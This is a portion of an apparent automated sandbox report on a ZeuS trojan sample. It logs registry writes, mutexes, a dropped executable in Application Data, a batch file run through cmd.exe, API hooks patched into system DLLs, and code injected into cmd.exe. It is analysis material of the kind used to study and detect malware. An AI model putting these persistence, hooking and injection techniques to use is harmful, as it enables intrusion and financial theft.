\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 3B05D3
\KnownDlls\NETAPI32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 3B05D3
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1 3B05D3
Registry Activities:
+ Key value set
Key Path Name Type Data Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Okmaykid Binary 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 1 C09F1A
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid ComputerName success or wait 1 414D3D
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft InstallDate success or wait 1 419EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId buffer overflow 2 419F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft DigitalProductId success or wait 1 419F86
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Enabled object name not found 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter EnabledV8 success or wait 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 C09FC6
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter CleanCookies success or wait 1 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1406 success or wait 5 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter 1609 success or wait 5 C09EC7
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Okmaykid success or wait 1 C09F57
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Okmaykid success or wait 1 C09F86
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\{CADEDF10-E78D-E5A8-185B-81F8EE8A3A3D} success or wait 1 414C09
\BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 1 BFC0F6
\BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2E59-CCC3D8887706} success or wait 1 C04B82
Process Activities:
+ Process started
PID Filepath Cmdline Flags Completion Count Source Address
224 C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe 0 success or wait 1 4174EF
2536 C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat 0 success or wait 1 4174EF
+ Process terminated
PID Filepath Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 1 415816
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 0 415816
Thread Activities:
+ Thread delayed
TID Delay Completion Count Source Address
10048 0s success or wait 39 417256
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1 8B success or wait 1 4155C7
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 30 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 30 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D95EE89 30 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA6BF 30 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA666 30 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D949088 30 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94654B 30 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D963381 30 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94BF83 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94878D 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42A97D 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E41A39A 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 C0A4F3
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7E42EA5E 30 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1 C0A4F3
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 10 B8 35 00 00 00 E9 A9 D1 B6 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 5 E9 33 B7 2E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA000A 10 68 6C 02 00 00 E9 1E 63 B7 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 5 E9 94 27 2E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0014 10 8B FF 55 8B EC E9 7C 11 A7 7B success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 5 E9 CE 79 3E 84 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA001E 10 8B FF 55 8B EC E9 9B FA BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 5 E9 97 45 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0028 10 8B FF 55 8B EC E9 5C EE BB 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D95EE89 5 E9 20 52 2A C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0032 10 8B FF 55 8B EC E9 88 A6 C1 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA6BF 5 E9 3E 9A 24 C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA003C 10 8B FF 55 8B EC E9 25 A6 C1 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D9BA666 5 E9 33 9B 24 C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0046 10 8B FF 55 8B EC E9 3D 90 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D949088 5 E9 AD B1 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0050 10 8B FF 55 8B EC E9 F6 64 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94654B 5 E9 2D DD 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA005A 10 8B FF 55 8B EC E9 22 33 BC 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D963381 5 E9 36 0F 2A C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0064 10 8B FF 55 8B EC E9 1A BF BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94BF83 5 E9 7E 83 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA006E 10 8B FF 55 8B EC E9 1A 87 BA 3C success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94878D 5 E9 A0 BB 2B C3 success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0078 10 8B FF 55 8B EC E9 AE 3D D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB3E2B 5 E9 83 8A 14 8F success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0082 10 8B FF 55 8B EC E9 A0 4B D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB4C27 5 E9 BF 7C 14 8F success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA008C 10 8B FF 55 8B EC E9 69 68 D1 70 success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 71AB68FA 5 E9 0D 60 14 8F success or wait 1 C0A591
2536 C:\WINDOWS\system32\cmd.exe 140000 159744 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1 C0A688
2536 C:\WINDOWS\system32\cmd.exe 162D50 4 00 00 00 00 success or wait 1 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162D64 4 00 00 14 00 success or wait 1 C04CA8
2536 C:\WINDOWS\system32\cmd.exe 163214 4 08 00 00 00 success or wait 1 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163218 4 0C 00 00 00 success or wait 1 C0442D
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 380000 12FF1C page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 380000 12FF20 page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 381000 12FBFC page read and write success or wait 1 406915
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 390000 12FEA4 page execute and read and write success or wait 1 4014B4
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 390000 12FEA8 page execute and read and write success or wait 1 4014B4
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3B0000 12FEA8 page execute and read and write success or wait 1 40167E
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 12FD60 page execute and read and write success or wait 1 3B0F29
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe B50000 12F910 page read and write success or wait 1 414961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe B50000 12F914 page read and write success or wait 1 414961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 181000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 182000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 183000 12F448 page read and write success or wait 1 4019F1
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe BD0000 12FAEC page read and write success or wait 1 41AED8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe BD0000 12EF0C page read and write success or wait 1 41AED8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe D20000 D1F6A8 page read and write success or wait 1 C04961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe D20000 D1F6AC page read and write success or wait 1 C04961
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 D1F47C page execute and read and write success or wait 1 C01A36
2536 C:\WINDOWS\system32\cmd.exe 140000 12E674 page execute and read and write success or wait 1 C0A5F6
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page read and write page readonly success or wait 1 4416D8
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page readonly page read and write success or wait 1 4416ED
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 27000 page execute and read and write page execute and read and write success or wait 1 3B0F37
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 400000 1000 page readonly page execute and read and write success or wait 1 3B1199
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 401000 21000 page execute read page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 422000 3000 page read and write page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 425000 2000 page readonly page execute and read and write success or wait 1 3B1217
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 410440 1000 page execute and read and write page execute read success or wait 1 41C089
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 410440 1000 page execute read page execute and read and write success or wait 1 41C0BC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0000 1000 page execute and read and write page execute and read and write success or wait 52 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA000A 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA0014 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 C0A5AD
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 C0A4CC
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe DA001E 1000 page execute and read and write page execute and read and write success or wait 1 C0A569
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 C0A591
1960 C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 C0A5AD
2536 C:\WINDOWS\system32\cmd.exe 140000 27000 page execute and read and write page execute and read and write success or wait 2 C0A688
2536 C:\WINDOWS\system32\cmd.exe 162D50 1000 page execute and read and write page execute and read and write success or wait 1 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162000 1000 page execute and read and write page execute and read and write success or wait 2 C04C88
2536 C:\WINDOWS\system32\cmd.exe 162D64 1000 page execute and read and write page execute and read and write success or wait 1 C04CA8
2536 C:\WINDOWS\system32\cmd.exe 163214 1000 page execute and read and write page execute and read and write success or wait 1 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163000 1000 page execute and read and write page execute and read and write success or wait 2 C0442D
2536 C:\WINDOWS\system32\cmd.exe 163218 1000 page execute and read and write page execute and read and write success or wait 1 C0442D
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 C072E5
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Security success or wait 1 417391
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1968319188
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 1968323012
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 1968326607
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1968328046
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 1968329191
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 1968329916
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1968331434
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 1968331791
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 1968334388
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 1968337140
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 1968342749
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 1968344725
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 1968348039
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 1968352157
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 1968360620
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 1968367436
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1968379313
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 1968382338
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 1968384407
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 1968398756
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page read and write New Protection: page readonly success or wait 1968438036
Memory attributes changed PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 400000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 1968438382
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: 380000 Length: 12FF1C Allocation Type: null Protection: page read and write success or wait 1968439110
